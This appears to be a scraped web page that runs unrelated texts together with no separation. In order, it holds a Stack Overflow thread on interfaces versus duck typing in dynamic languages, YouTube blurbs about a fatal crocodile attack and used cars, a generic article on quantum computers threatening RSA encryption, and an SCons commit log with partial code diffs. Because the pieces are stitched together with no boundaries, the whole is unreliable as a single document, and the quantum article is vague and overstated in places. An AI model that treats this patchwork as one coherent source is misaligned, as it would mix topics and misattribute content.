Stack Overflow is a question and answer site for professional and enthusiast programmers.

In static languages like Java you need interfaces because otherwise the type system just won't let you do certain things. But in dynamic languages like PHP and Python you just take advantage of duck typing.

PHP supports interfaces; Ruby and Python don't have them. So you can clearly live happily without them. I've been mostly doing my work in PHP and have never really made use of the ability to define interfaces. When I need a set of classes to implement a certain common interface, I just describe it in documentation.

So, what do you think? Aren't you better off without using interfaces in dynamic languages at all?

17 Answers

I think of it more as a level of convenience. If you have a function which takes a "file-like" object and only calls a read() method on it, then it's inconvenient, even limiting, to force the user to implement some sort of File interface. It's just as easy to check if the object has a read method. But if your function expects a large set of methods, it's easier to check if the object supports an interface than to check for support of each individual method.

Yes, there is a point. If you don't explicitly use interfaces, your code still uses the object as though it implemented certain methods; it's just unclear what the unspoken interface is. If you define a function to accept an interface (in PHP, say), then it'll fail earlier, and the problem will be with the caller, not with the method doing the work. Generally, failing earlier is a good rule of thumb to follow.

Interfaces actually add some degree of dynamic-language-like flexibility to static languages that have them, like Java. They offer a way to query an object for which contracts it implements at runtime.
That concept ports well into dynamic languages. Depending on your definition of the word "dynamic", of course, that even includes Objective-C, which makes use of Protocols pretty extensively in Cocoa.

In Ruby you can ask whether an object responds to a given method name. But that's a pretty weak guarantee that it's going to do what you want, especially given how few words get used over and over, and that the full method signature isn't taken into account. In Ruby I might ask:

    object.respond_to? :sync

So, yeah, it has a method named "sync", whatever that means. In Objective-C I might ask something similar, i.e. "does this look/walk/quack like something that synchronizes?":

    [myObject respondsToSelector:@selector(sync)]

Even better, at the cost of some verbosity, I can ask something more specific, i.e. "does this look/walk/quack like something that synchronizes to MobileMe?":

    [myObject respondsToSelector:@selector(sync:withMobileMeAccount:)]

That's duck typing down to the species level. But to really ask an object whether it is promising to implement synchronization to MobileMe:

    [receiver conformsToProtocol:@protocol(MobileMeSynchronization)]

Of course, you could implement protocols by just checking for the presence of a series of selectors that you consider the definition of a protocol/duck, if they are specific enough. At that point the protocol is just an abbreviation for a big hunk of ugly respond_to? queries, and some very useful syntactic sugar for the compiler/IDE to use.

Interfaces/protocols are another dimension of object metadata that can be used to implement dynamic behavior in the handling of those objects. In Java the compiler just happens to demand that sort of thing for normal method invocation. But even dynamic languages like Ruby, Python, Perl, etc. implement a notion of type that goes beyond just "what methods an object responds to"; hence the class keyword. JavaScript is the only really commonly used language without that concept.
If you've got classes, then interfaces make sense, too. They're admittedly more useful for complicated libraries or class hierarchies than in most application code, but I think the concept is useful in any language.

Also, somebody else mentioned mixins. Ruby mixins are a way to share code; that is, they relate to the implementation of a class. Interfaces/protocols are about the interface of a class or object. The two can actually complement each other: you might have an interface which specifies a behavior, and one or more mixins which help an object to implement that behavior. Of course, I can't think of any languages which really have both as distinct first-class language features; in those with mixins, including the mixin usually implies the interface it implements.

If you do not have high security constraints (so nobody will access your data in a way you don't want) and you have good documentation or well-trained coders (so they don't need the interpreter/compiler to tell them what to do), then no, it's useless. For most medium-size projects, duck typing is all you need.

I think use of interfaces is determined more by how many people will be using your library. If it's just you, or a small team, then documentation and convention will be fine, and requiring interfaces will be an impediment. If it's a public library, then interfaces are much more useful because they constrain people to provide the right methods rather than just hint at them. So interfaces are definitely a valuable feature for writing public libraries, and I suppose that lack (or at least de-emphasis) of interfaces is one of the many reasons why dynamic languages are used more for apps and strongly-typed languages are used for big libraries.

I was under the impression that Python doesn't have interfaces.
As far as I'm aware, in Python you can't enforce a method to be implemented at compile time, precisely because it is a dynamic language. There are interface libraries for Python, but I haven't used any of them. Python also has mixins, so you could create an Interface class by defining a mixin and having pass for every method implementation, but that's not really giving you much value.

    Thanks for pointing this out. I did a web search before, found an article that discussed interfaces in Python and concluded that Python must have interfaces - actually the article discussed the question of adding interfaces to Python. –  Rene Saarsoo Sep 18 '08 at 11:21

Rene, please read my answer to the "Best Practices for Architecting Large Systems in a Dynamic Language" question here on Stack Overflow. I discuss some benefits of giving away the freedom of dynamic languages to save development effort and to ease introducing new programmers to the project. Interfaces, when used properly, greatly contribute to writing reliable software.

Python 3000 will have Abstract Base Classes. Well worth a read.

One use of the Java "interface" is to allow strongly-typed mixins in Java. You mix in the proper superclass, plus any additional methods implemented to support the interface. Python has multiple inheritance, so it doesn't really need the interface contrivance to allow methods from multiple superclasses.

I, however, like some of the benefits of strong typing; primarily, I'm a fan of early error detection. I try to use an "interface-like" abstract superclass definition:

    class InterfaceLikeThing( object ):
        def __init__( self, arg ):
            self.attr = None
            self.otherAttr = arg
        def aMethod( self ):
            raise NotImplementedError
        def anotherMethod( self ):
            return NotImplemented

This formalizes the interface, in a way. It doesn't provide absolute evidence for a subclass matching the expectations.
However, if a subclass fails to implement a required method, my unit tests will fail with an obvious NotImplemented return value or NotImplementedError exception.

    Have you ever used the interface libraries in Plone or Trac? Trac in particular is a very approachable codebase and makes use of interfaces in its plugin architecture. The code might do things like querying for all IMainMenuItem implementations to populate the main menu. –  joeforker Feb 4 '09 at 18:17

    +1 for making up for the lack of type checks with unit tests! –  Paolo Tedesco Mar 27 '09 at 8:40

In a language like PHP, where a method call that doesn't exist results in a fatal error and takes the whole application down, interfaces make sense. In a language like Python, where you can catch and handle invalid method calls, they don't.

Well, first of all, it's right that Ruby does not have interfaces as such, but it has mixins, which somehow take the best of both interfaces and abstract classes from other languages. The main goal of an interface is to ensure that your object SHALL implement ALL the methods present in the interface itself. Of course, interfaces are never mandatory; even in Java you could imagine working only with classes and using reflection to call methods when you don't know which kind of object you're manipulating, but that is error-prone and should be discouraged in many ways.

Well, it would certainly be easier to check if a given object supported an entire interface, instead of just not crashing when you call the one or two methods you use in the initial method, for instance to add an object to an internal list. Duck typing has some of the benefits of interfaces, that is, ease of use everywhere, but the detection mechanism is still missing.

It's like saying you don't need explicit types in a dynamically-typed language.
Why don't you make everything a "var" and document their types elsewhere? It's a restriction imposed on a programmer, by a programmer. It makes it harder for you to shoot yourself in the foot; it gives you less room for error.

As a PHP programmer, the way I see it, an interface is basically used as a contract. It lets you say that everything which uses this interface MUST implement a given set of functions. I dunno if that's all that useful, but I found it a bit of a stumbling block when trying to understand what interfaces were all about.

If you felt you had to, you could implement a kind of interface with a function that compares an object's methods/attributes to a given signature. Here's a very basic example:

    file_interface = ('read', 'readline', 'seek')

    class InterfaceException(Exception):
        pass

    def implements_interface(obj, interface):
        d = dir(obj)
        for item in interface:
            if item not in d:
                raise InterfaceException("%s not implemented." % item)
        return True

    >>> import StringIO
    >>> s = StringIO.StringIO()
    >>> implements_interface(s, file_interface)
    True
    >>>
    >>> fp = open('/tmp/123456.temp', 'a')
    >>> implements_interface(fp, file_interface)
    True
    >>> fp.close()
    >>>
    >>> d = {}
    >>> implements_interface(d, file_interface)
    Traceback (most recent call last):
      File "<stdin>", line 1, in <module>
      File "<stdin>", line 4, in implements_interface
    __main__.InterfaceException: read not implemented.

Of course, that doesn't guarantee very much.

In addition to the other answers, I just want to point out that JavaScript has an instanceof keyword that will return true if the given instance is anywhere in a given object's prototype chain. This means that if you use your "interface object" in the prototype chain for your "implementation objects" (both are just plain objects to JS), then you can use instanceof to determine if it "implements" it.
This does not help the enforcement aspect, but it does help in the polymorphism aspect, which is one common use for interfaces. See the MDN instanceof reference.

Stop trying to write Java in a dynamic language.

    Well, I asked this question because I thought that interfaces in PHP were kind of Java-ish... and I really dislike Java... haven't used it for years. –  Rene Saarsoo Apr 5 '09 at 21:28
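One of the answers above mentions that Python 3000 will get Abstract Base Classes; those did arrive as the standard abc module (Python 2.6/3.0 and later), and they give a dynamic language exactly the kind of opt-in, queryable contract these answers discuss. A minimal sketch (the Readable/FileLike names are illustrative, not from any real library):

```python
from abc import ABCMeta, abstractmethod

class Readable(metaclass=ABCMeta):
    """An explicit contract: conforming classes must define read()."""
    @abstractmethod
    def read(self):
        raise NotImplementedError

class FileLike(Readable):
    def read(self):
        return "data"

class Opaque:
    pass

# Conformance is queryable at runtime, much like conformsToProtocol: above.
print(isinstance(FileLike(), Readable))  # True
print(isinstance(Opaque(), Readable))    # False

# And the contract fails early: abstract classes refuse instantiation.
try:
    Readable()
except TypeError as exc:
    print("refused:", exc)
```

ABCs also support register(), which declares that an existing class conforms without making it inherit from the ABC, so duck-typed third-party classes can be brought under a contract after the fact.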
This Man-Eating Crocodile Eats Man Alive While Kayaking!

Hendri Coetzee was an avid explorer from South Africa who was tragically eaten alive by a crocodile while kayaking in the Congo. This video contains graphic descriptions of animal attacks and may include dramatic re-enactments of the attack. Viewer discretion is advised.

DISCLAIMER: The pictures, audio, and video used in the videos on this channel are a mix of paid stock, by-attribution, royalty-free, public-domain, and other copyright-free sources. No copyright infringement is intended. All rights belong to their respective owners. If you are or represent the copyright owner of materials used in this video and have an issue with the use of said material, please send an email to [email protected] and I will respond immediately. @FinalAffliction

The CAR WIZARD shares 6 Super Reliable vehicles under $10K!

The CAR WIZARD 🧙‍♂️ presents a new BTNT in his ongoing series. This video shares six super reliable cars, trucks or SUVs priced under $10,000. Please remember these recommendations are based on his experiences with these cars as a mechanic and the services he has found they do or do not require.

🔮🔧 AMAZON AFFILIATE STORE: https://www.amazon.com/shop/omegaauto... 🔧🔮
🇬🇧🇬🇧 UK AMAZON STORE: https://www.amazon.co.uk/shop/omegaau... 🇬🇧🇬🇧
🧰 BENDPAK LIFTS: https://www.bendpak.com 🧰

1:40 00-05 LeSabre
3:50 99-06 Silverado or Sierra
6:50 04-09 RX330/350
8:45 98-12 Crown Vic
11:00 96-00 LS400
13:00 01-07 Highlander

How Quantum Computers Break The Internet... Starting Now

Quantum Computers and the Future of Encryption: Challenges and Solutions

Encryption has become a crucial aspect of our modern digital world. It allows us to securely transmit and store sensitive information, such as financial data, medical records, and personal communications. However, recent advancements in quantum computing have raised concerns about the security of our current encryption methods.
In this article, we will explore the possibility of quantum computers breaking current levels of encryption and discuss some possible solutions to this problem.

The Rise of Quantum Computing

Quantum computing is a new technology that uses quantum mechanics to perform complex calculations at a speed that is significantly faster than classical computing. This is because quantum computers utilize qubits, which can exist in multiple states simultaneously, allowing them to perform many calculations at once. This makes quantum computers particularly effective at solving problems that are too complex for classical computers to handle.

The potential applications of quantum computing are vast, ranging from drug discovery to weather forecasting. However, quantum computing also poses a threat to our current encryption methods. This is because many encryption algorithms rely on the difficulty of factoring large numbers, a problem that can be solved quickly by a quantum computer using Shor's algorithm.

The Threat to Encryption

Our current encryption methods, such as RSA and elliptic curve cryptography, are based on mathematical problems that are difficult for classical computers to solve. For example, RSA encryption relies on the difficulty of factoring the product of two large prime numbers. However, these problems can be solved quickly by a quantum computer using Shor's algorithm.

This means that a quantum computer could potentially break current encryption methods, exposing sensitive information to malicious actors. This is particularly concerning for industries that rely on encryption, such as finance, healthcare, and government.

Possible Solutions

Despite the threat that quantum computing poses to encryption, there are possible solutions to this problem. One solution is to develop new encryption methods that are resistant to quantum attacks.
This includes post-quantum cryptography, which uses mathematical problems that are believed to be difficult for both classical and quantum computers to solve.

Another solution is to implement quantum key distribution (QKD), which uses the principles of quantum mechanics to securely distribute encryption keys. This method relies on the fact that any attempt to intercept a quantum signal will disturb it, making it impossible to eavesdrop without being detected.

Finally, some experts suggest that a hybrid approach, using both classical and quantum computing, could be a viable solution. This approach would utilize the strengths of both types of computers to create a more secure encryption system.

Conclusion

Quantum computing has the potential to revolutionize many industries, but it also poses a threat to our current encryption methods. As quantum computing continues to develop, it is important to explore new encryption methods and solutions to ensure that our sensitive information remains secure. Whether it is post-quantum cryptography, QKD, or a hybrid approach, the key is to stay ahead of the threat and be prepared for the future of computing.

Sources:
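The factoring asymmetry discussed in the article can be made concrete with a toy sketch. The function below factors a small semiprime by classical trial division, which takes on the order of sqrt(n) steps; for a real 2048-bit RSA modulus that search is hopeless, and it is exactly this gap that Shor's algorithm on a large quantum computer would erase. The 3233 example modulus and the function name are illustrative only:

```python
def trial_division_factor(n):
    """Classical factoring: O(sqrt(n)) divisions in the worst case."""
    f = 2
    while f * f <= n:
        if n % f == 0:
            return f, n // f  # smallest prime factor first
        f += 1
    return n, 1  # n itself is prime

# Toy "RSA modulus": the product of two small primes.
p, q = trial_division_factor(3233)
print(p, q)  # 53 61
```

Doubling the bit length of n roughly squares the work for trial division (and the work still grows superpolynomially for the best known classical algorithms), while Shor's algorithm scales polynomially in the bit length; that widening gap is why post-quantum schemes avoid factoring-based hardness altogether.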
Commits
Anonymous committed 6661c9e

Merged revisions 1968-2115 via svnmerge from
http://scons.tigris.org/svn/scons/branches/core

........
r1970 | stevenknight | 2007-06-01 18:22:37 -0500 (Fri, 01 Jun 2007) | 4 lines
Import a vanilla Python 2.3 version of textwrap.py into the compatibility library, so we can track the changes we'll make to it. (This isn't actually used yet.)
........
r1971 | stevenknight | 2007-06-02 00:38:20 -0500 (Sat, 02 Jun 2007) | 2 lines
Add a compatibility module for the textwrap.py module introduced in Python 2.3.
........
r1972 | stevenknight | 2007-06-02 00:39:26 -0500 (Sat, 02 Jun 2007) | 2 lines
Remove spurious <para> tags.
........
r1973 | stevenknight | 2007-06-03 08:57:05 -0500 (Sun, 03 Jun 2007) | 2 lines
Improved help-text generation using a textwrap.TextWrapper object.
........
r1991 | stevenknight | 2007-06-10 16:03:18 -0500 (Sun, 10 Jun 2007) | 3 lines
Add compatibility versions of the all() and any() functions introduced in Python 2.5.
........
r1992 | stevenknight | 2007-06-10 17:02:18 -0500 (Sun, 10 Jun 2007) | 8 lines
SCons-time portability fixes for Python 2.[12]:
-- Use "from __future__ import nested_scopes".
-- Create "False" and "True" builtins.
-- Work around the lack of a "prefix =" keyword argument to the Python 2.[12] version of the mktemp module.
-- Accommodate pickier single-element tuple syntax.
........
r1993 | stevenknight | 2007-06-10 17:27:43 -0500 (Sun, 10 Jun 2007) | 3 lines
Delay instantiation of pstat.Stats objects until after we override sys.stdout, which as of Python 2.5 is captured when the object is created.
........
r1994 | stevenknight | 2007-06-10 21:22:42 -0500 (Sun, 10 Jun 2007) | 6 lines
Update various tests to handle the
    File "SConstruct", line 1, in <module>
messages in Python 2.5.
........
r1995 | stevenknight | 2007-06-10 21:32:16 -0500 (Sun, 10 Jun 2007) | 3 lines
Update tests to not raise strings as exceptions, which has been deprecated in Python 2.5.
........
r1996 | stevenknight | 2007-06-10 21:41:57 -0500 (Sun, 10 Jun 2007) | 3 lines
Fix the Scanner hash unit test for Python 2.5. (Yes, it still works on previous versions, too.)
........
r1997 | stevenknight | 2007-06-10 21:55:46 -0500 (Sun, 10 Jun 2007) | 3 lines
Make the mock Node object's side_effect attribute a list, so it's iterable in Python 2.1 as well.
........
r1998 | stevenknight | 2007-06-10 22:04:26 -0500 (Sun, 10 Jun 2007) | 3 lines
Append an explicit tuple to the delayed_warnings list if there are problems interpreting --debug=memoizer.
........
r1999 | stevenknight | 2007-06-11 11:09:07 -0500 (Mon, 11 Jun 2007) | 2 lines
Fix --debug=time with -j when no arguments are rebuilt (all up-to-date).
........
r2007 | stevenknight | 2007-06-14 13:56:35 -0500 (Thu, 14 Jun 2007) | 4 lines
Performance improvement when looking up Nodes: don't use is_String(), just check for the initial '#' that specifies a top-relative lookup, and handle the exceptions.
........
r2008 | stevenknight | 2007-06-14 16:57:47 -0500 (Thu, 14 Jun 2007) | 11 lines
First step in refactoring command-line flag processing: split out the current processing into its own module, with minimal additional changes. Among the minimal changes:
-- Store delayed warnings (for deprecated --debug= keywords) in the option parser object, not in a global variable.
-- Remove the OptParser variable itself from the SCons.Script globals. It's going to change significantly (and no one's probably using it anyway).
-- Don't move definition of the --version output with the OptParser, keep it in Main.py.
........
r2009 | stevenknight | 2007-06-15 08:15:25 -0500 (Fri, 15 Jun 2007) | 3 lines
Refactor the test/explain.py script into three individual scripts so it's easier to deal with.
........
r2010 | stevenknight | 2007-06-15 09:49:07 -0500 (Fri, 15 Jun 2007) | 3 lines
Handle Aliases in --debug=explain. This is kind of hard-coded for the normal lookup, and should be better handled by the signature refactoring.
........
r2011 | stevenknight | 2007-06-15 17:25:37 -0500 (Fri, 15 Jun 2007) | 5 lines
Refactor use of the command-line parser object so it's localized to the top-level main() function, and not passed down through _exec_main() or to _main() itself. Replace its functionality with use of an exception to signal that the top-level main() function should print its help message.
........
r2012 | stevenknight | 2007-06-17 23:34:26 -0500 (Sun, 17 Jun 2007) | 2 lines
Remove unnecessary import of __main__.
........
r2013 | stevenknight | 2007-06-17 23:48:06 -0500 (Sun, 17 Jun 2007) | 2 lines
Pass the options object to _main(), don't use a global.
........
r2014 | stevenknight | 2007-06-18 00:12:09 -0500 (Mon, 18 Jun 2007) | 6 lines
Qt test fixes for Windows:
Link against a static library created by the test infrastructure, not a shared library.
Escape backslashes in Windows path names.
Skip test/QT/Tool.py if Qt isn't installed.
........
r2015 | stevenknight | 2007-06-18 10:46:17 -0500 (Mon, 18 Jun 2007) | 3 lines
Support GetOption('no_exec'), and update test/NodeOps.py to use it instead of reaching into the SCons.Script.Main internals.
........
r2016 | stevenknight | 2007-06-18 11:04:39 -0500 (Mon, 18 Jun 2007) | 4 lines
Restore use of a global delayed_warnings variable so the chicken-and-egg warning from trying to use --debug=memoizer on Python versions without metaclasses has somewhere to go.
........
r2017 | stevenknight | 2007-06-18 11:37:59 -0500 (Mon, 18 Jun 2007) | 3 lines
Have the test infrastructure create a mock Qt shared library on UNIX, static library on Windows.
........
r2018 | stevenknight | 2007-06-18 11:48:10 -0500 (Mon, 18 Jun 2007) | 2 lines
Pull more globals into the command-line parser options object.
........
r2023 | stevenknight | 2007-06-19 16:46:02 -0500 (Tue, 19 Jun 2007) | 3 lines
Refactor the __checkClass() and must_be_a_Dir() methods into a more general and more efficient must_be_same() method.
........
r2025 | stevenknight | 2007-06-19 20:56:10 -0500 (Tue, 19 Jun 2007) | 3 lines
More clean up: change various self.fs.Entry() calls to calls through the bound directory.Entry() method.
........
r2033 | stevenknight | 2007-06-20 20:03:23 -0500 (Wed, 20 Jun 2007) | 5 lines
The --debug=count option doesn't work when run with Python -O, or from optimized compiled Python modules (*.pyo files), because the counting is all within "if __debug__:" blocks that get stripped. Print a warning so it doesn't look like --debug=count is broken.
........
r2037 | stevenknight | 2007-06-21 10:42:40 -0500 (Thu, 21 Jun 2007) | 3 lines
Replace the _stripixes() function with a more efficient/readable version that was checked in, but commented out, prior to 0.96.96.
........
r2040 | stevenknight | 2007-06-21 12:18:57 -0500 (Thu, 21 Jun 2007) | 2 lines
Ignore *.pyo files, too, since one of the tests now generates them.
........
r2051 | stevenknight | 2007-06-26 15:11:57 -0500 (Tue, 26 Jun 2007) | 5 lines
Arrange for graceful shutdown of the worker threads by writing None to the requestQueue and having the worker threads terminate their processing loops when they read it. We can then .join() the threads, to wait for their termination, avoiding exceptions in the threading library module.
........
r2052 | stevenknight | 2007-06-26 15:12:53 -0500 (Tue, 26 Jun 2007) | 3 lines
Have the SWIG tests that use the Python.h header skip gracefully if the Python development environment isn't installed.
........
r2053 | stevenknight | 2007-06-26 15:23:55 -0500 (Tue, 26 Jun 2007) | 3 lines
Massage the datestamp and IDs in the generated PDF so we can compare before-and-after output reliably regardless of when generated.
........
r2054 | stevenknight | 2007-06-26 15:25:56 -0500 (Tue, 26 Jun 2007) | 3 lines
Fix the regular expression that matches the Qt warning message when the moc executable is used as a hint.
........
r2055 | stevenknight | 2007-06-26 15:48:21 -0500 (Tue, 26 Jun 2007) | 2 lines
Fix 2.5.1 string exception warnings.
........
r2056 | stevenknight | 2007-06-26 19:23:22 -0500 (Tue, 26 Jun 2007) | 2 lines
Skip the scons-time tests if the Python version can't import __future__.
........
r2057 | stevenknight | 2007-06-26 22:11:04 -0500 (Tue, 26 Jun 2007) | 3 lines
Normalize PDF output in the bibtex rerun test as well. Commonize the PDF normalization logic by putting it in QMTest/TestSCons.py.
........
r2058 | stevenknight | 2007-06-26 22:50:39 -0500 (Tue, 26 Jun 2007) | 3 lines
Duplicate a function declaration to suppress compiler warnings about a cast, when using certain systems/compilers.
........
r2059 | stevenknight | 2007-06-26 22:53:12 -0500 (Tue, 26 Jun 2007) | 2 lines
Use the frtbegin when compiling Fortran programs using GCC 4.
........
r2060 | stevenknight | 2007-06-26 23:13:35 -0500 (Tue, 26 Jun 2007) | 2 lines
Make the object that goes into the shared library a shared object file.
........
r2061 | stevenknight | 2007-06-26 23:53:49 -0500 (Tue, 26 Jun 2007) | 4 lines
Split test/AS/AS.py into sub-tests for the live assemblers it tests. Only test nasm for the known configuration of version 0.98* on a 32-bit x86 system.
........
r2063 | stevenknight | 2007-06-27 09:51:43 -0500 (Wed, 27 Jun 2007) | 2 lines
Fix searching for the rmic utility.
........
r2064 | stevenknight | 2007-06-27 10:26:42 -0500 (Wed, 27 Jun 2007) | 3 lines
Improved worker-thread termination in a separate Job.cleanup() method. (Adam Simpkins)
........
r2087 | stevenknight | 2007-07-03 12:22:10 -0500 (Tue, 03 Jul 2007) | 7 lines
Get rid of unnecessary subclassing and complicating overriding of __init__() and parse_args() methods in favor of more straightforward initialization of the OptionParser object. We may need to restore subclassing in the future, but if so we'll do it in a more OO way.
........
r2088 | stevenknight | 2007-07-03 16:12:30 -0500 (Tue, 03 Jul 2007) | 2 lines
Fix a cleanup error (no self.p4d attribute) when Perforce isn't installed.
........
r2090 | stevenknight | 2007-07-04 03:23:57 -0500 (Wed, 04 Jul 2007) | 2 lines
Import the vanilla Python 2.5 optparse.py for use as a compatibility module.
........
r2091 | stevenknight | 2007-07-04 03:35:17 -0500 (Wed, 04 Jul 2007) | 5 lines
Use the new optparse compatibility module for command-line processing, and remove the SCons/Optik/*.py modules, with appropriate subclassing in Script/SConsOptions.py to preserve the way we print help text and SCons error messages.
........
r2108 | stevenknight | 2007-07-08 22:57:08 -0500 (Sun, 08 Jul 2007) | 3 lines
Make all of the optparse.add_options calls more-or-less consistent in how they call the keyword arguments.
........
r2109 | stevenknight | 2007-07-09 12:31:01 -0500 (Mon, 09 Jul 2007) | 6 lines
Consolidate command-line and {Get,Set}Option() processing and access in a single subclass of the optparse.Values() class. Allow all options, not just those that aren't SConscript-settable, to set their default values when calling op.add_option().
........
r2110 | stevenknight | 2007-07-09 13:17:58 -0500 (Mon, 09 Jul 2007) | 4 lines
Handle initialization of command-line repository options by passing the option arguments directly to the _SConstruct_exists() utility function, not by setting a global variable.
........
r2111 | stevenknight | 2007-07-09 13:42:41 -0500 (Mon, 09 Jul 2007) | 2 lines
Remove the unused _varargs() utility function.
........
r2112 | stevenknight | 2007-07-09 15:21:51 -0500 (Mon, 09 Jul 2007) | 2 lines
Clean up how we use optparse (mainly for readability).
........
r2113 | stevenknight | 2007-07-10 15:50:08 -0500 (Tue, 10 Jul 2007) | 2 lines
More old-Python-version compatibility changes in optparse.py.
........
r2114 | stevenknight | 2007-07-10 16:46:42 -0500 (Tue, 10 Jul 2007) | 3 lines
Add support for a new AddOption() function to allow the SConscript file(s) to define new command-line flags.
........

Participants
Parent commits: e4b07e2
Comments (0)
Files changed (72)

File QMTest/TestSCons.py

     for l in stderr.readlines():
         list = string.split(l)
         if len(list) > 3 and list[:2] == ['gcc', 'version']:
-            if list[2][:2] == '3.':
+            if list[2][:2] in ('3.', '4.'):
                 libs = ['frtbegin'] + libs
                 break
     return libs

         # we call test.no_result().
         self.no_result(skip=1)

-    def diff_substr(self, expect, actual):
+    def diff_substr(self, expect, actual, prelen=20, postlen=40):
         i = 0
         for x, y in zip(expect, actual):
             if x != y:
                 return "Actual did not match expect at char %d:\n" \
                        "    Expect:  %s\n" \
                        "    Actual:  %s\n" \
-                       % (i, repr(expect[i-20:i+40]), repr(actual[i-20:i+40]))
+                       % (i, repr(expect[i-prelen:i+postlen]),
+                          repr(actual[i-prelen:i+postlen]))
             i = i + 1
         return "Actual matched the expected output???"

         x = string.replace(x, 'line 1,', 'line %s,' % line)
         return x

+    def normalize_pdf(self, s):
+        s = re.sub(r'/CreationDate \(D:[^)]*\)',
+                   r'/CreationDate (D:XXXX)', s)
+        s = re.sub(r'/ID \[<[0-9a-fA-F]*> <[0-9a-fA-F]*>\]',
+                   r'/ID [<XXXX> <XXXX>]', s)
+        return s
+
     def java_ENV(self):
         """
         Return a default external environment that uses a local Java SDK

         else:
             opt_string = opt_string + ' ' + opt
         for a in args:
             contents = open(a, 'rb').read()
+            a = string.replace(a, '\\\\', '\\\\\\\\')
             subst = r'{ my_qt_symbol( "' + a + '\\\\n" ); }'
             if impl:
                 contents = re.sub( r'#include.*', '', contents )

         self.write([dir, 'lib', 'SConstruct'], r"""
 env = Environment()
-env.SharedLibrary( 'myqt', 'my_qobject.cpp' )
+import sys
+if sys.platform == 'win32':
+    env.StaticLibrary( 'myqt', 'my_qobject.cpp' )
+else:
+    env.SharedLibrary( 'myqt', 'my_qobject.cpp' )
 """)

         self.run(chdir = self.workpath(dir, 'lib'),

File QMTest/TestSCons_time.py

         apply(TestCommon.__init__, [self], kw)

+        # Now that the testing object has been set up, check if we should
+        # skip the test due to the Python version.  We need to be able to
+        # import __future__ (which scons-time.py uses for nested scopes)
+        # and to handle list comprehensions (just because we're avoiding
+        # the old map() and filter() idioms).
+
+        try:
+            import __future__
+        except ImportError:
+            version = string.split(sys.version)[0]
+            msg = 'scons-time does not work on Python version %s\n' % version
+            self.skip_test(msg)
+
         try:
             eval('[x for x in [1, 2]]')
         except SyntaxError:

File doc/man/scons.1

 of the various classes used internally by SCons
 before and after reading the SConscript files
 and before and after building targets.
-This only works when run under Python 2.1 or later.
+This is not supported when run under Python versions earlier than 2.1,
+when SCons is executed with the Python
+.B -O
+(optimized) option,
+or when the SCons modules
+have been compiled with optimization
+(that is, when executing from
+.B *.pyo
+files).
 .TP
 --debug=dtree

 .EE
 '\"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
+.TP
+.RI AddOption( arguments )
+This function adds a new command-line option to be recognized.
+The specified
+.I arguments
+are the same as supported by the standard Python
+.B optparse.add_option
+method;
+see the documentation for
+.B optparse
+for a thorough discussion of its option-processing capabilities.
+(Note that although the
+.B optparse
+module was not a standard module until Python 2.3,
+.B scons
+contains a compatible version of the module
+that is used to provide identical functionality
+when run by earlier Python versions.)
+
+If no
+.B default=
+keyword argument is supplied when calling
+.BR AddOption (),
+the option will have a default value of
+.BR None .
+
+Once a new command-line option has been added with
+.BR AddOption (),
+the option value may be accessed using
+.BR GetOption ()
+or
+.BR env.GetOption ().
+The value may also be set, using
+.BR SetOption ()
+or
+.BR env.SetOption (),
+if conditions in a
+.B SConscript
+require overriding any default value.
+Note, however, that a
+value specified on the command line will
+.I always
+override a value set by any SConscript file.
+
+Any specified
+.B help=
+strings for the new option(s)
+will be displayed by the
+.B -H
+or
+.B -h
+options
+(the latter only if no other help text is
+specified in the SConscript files).
+The help text for the local options specified by
+.BR AddOption ()
+will appear below the SCons options themselves,
+under a separate
+.B "Local Options"
+heading.
+The options will appear in the help text
+in the order in which the
+.BR AddOption ()
+calls occur.
+
+Example:
+
+.ES
+AddOption('--prefix',
+          dest='prefix',
+          nargs=1, type='string',
+          action='store',
+          metavar='DIR',
+          help='installation prefix')
+env = Environment(PREFIX = GetOption('prefix'))
+.EE
+
+'\"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
 .TP
 .RI AddPostAction( target ", " action )

 which corresponds to --implicit-cache;
 .B max_drift
 which corresponds to --max-drift;
+.B no_exec
+which corresponds to -n, --no-exec, --just-print, --dry-run and --recon;
 .B num_jobs
 which corresponds to -j and --jobs.
 .B random

File doc/user/libraries.in

 </para>

-    <para>
-
     <scons_example name="objects" printme="1">
       <file name="SConstruct" printme="1">
 Library('foo', ['f1.c', 'f2.o', 'f3.c', 'f4.o'])

File doc/user/libraries.sgml

 </para>

-    <para>
-
     <programlisting>
 Library('foo', ['f1.c', 'f2.o', 'f3.c', 'f4.o'])
     </programlisting>

File src/CHANGES.txt

   - Support {Get,Set}Option('random') so random-dependency interaction
     with CacheDir() is controllable from SConscript files.

+  - Add a new AddOption() function to support user-defined command-
+    line flags (like --prefix=, --force, etc.).
+
   - Push and retrieve built symlinks to/from a CacheDir() as actual
     symlinks, not by copying the file contents.

     for adding a new method, respectively, to a construction
     environment or an arbitrary object (such as a class).

+  - Fix the --debug=time option when the -j option is specified and all
+    files are up to date.
+
   From Leanid Nazdrynau:

   - When applying Tool modules after a construction environment has

   - Find Java anonymous classes when the next token after the name is an
     open parenthesis.

+  From Adam Simpkins:
+
+  - Allow worker threads to terminate gracefully when all jobs are
+    finished.
+
   From Sohail Somani:

   - Add LaTeX scanner support for finding dependencies specified with

File src/engine/MANIFEST.in

 SCons/Action.py
 SCons/Builder.py
 SCons/compat/__init__.py
+SCons/compat/_scons_optparse.py
 SCons/compat/_scons_sets.py
 SCons/compat/_scons_sets15.py
 SCons/compat/_scons_subprocess.py
+SCons/compat/_scons_textwrap.py
 SCons/compat/_scons_UserString.py
 SCons/compat/builtins.py
 SCons/Conftest.py

 SCons/Node/Alias.py
 SCons/Node/FS.py
 SCons/Node/Python.py
-SCons/Optik/__init__.py
-SCons/Optik/errors.py
-SCons/Optik/option.py
-SCons/Optik/option_parser.py
 SCons/Options/__init__.py
 SCons/Options/BoolOption.py
 SCons/Options/EnumOption.py

 SCons/SConsign.py
 SCons/Script/Main.py
 SCons/Script/SConscript.py
+SCons/Script/SConsOptions.py
 SCons/Script/__init__.py
 SCons/Sig/__init__.py
 SCons/Sig/MD5.py

File src/engine/SCons/Defaults.py

     return result

 def _stripixes(prefix, list, suffix, stripprefix, stripsuffix, env, c=None):
-    """This is a wrapper around _concat() that checks for the existence
-    of prefixes or suffixes on list elements and strips them where it
-    finds them.  This is used by tools (like the GNU linker) that need
-    to turn something like 'libfoo.a' into '-lfoo'."""
+    """
+    This is a wrapper around _concat()/_concat_ixes() that checks for the
+    existence of prefixes or suffixes on list elements and strips them
+    where it finds them.  This is used by tools (like the GNU linker)
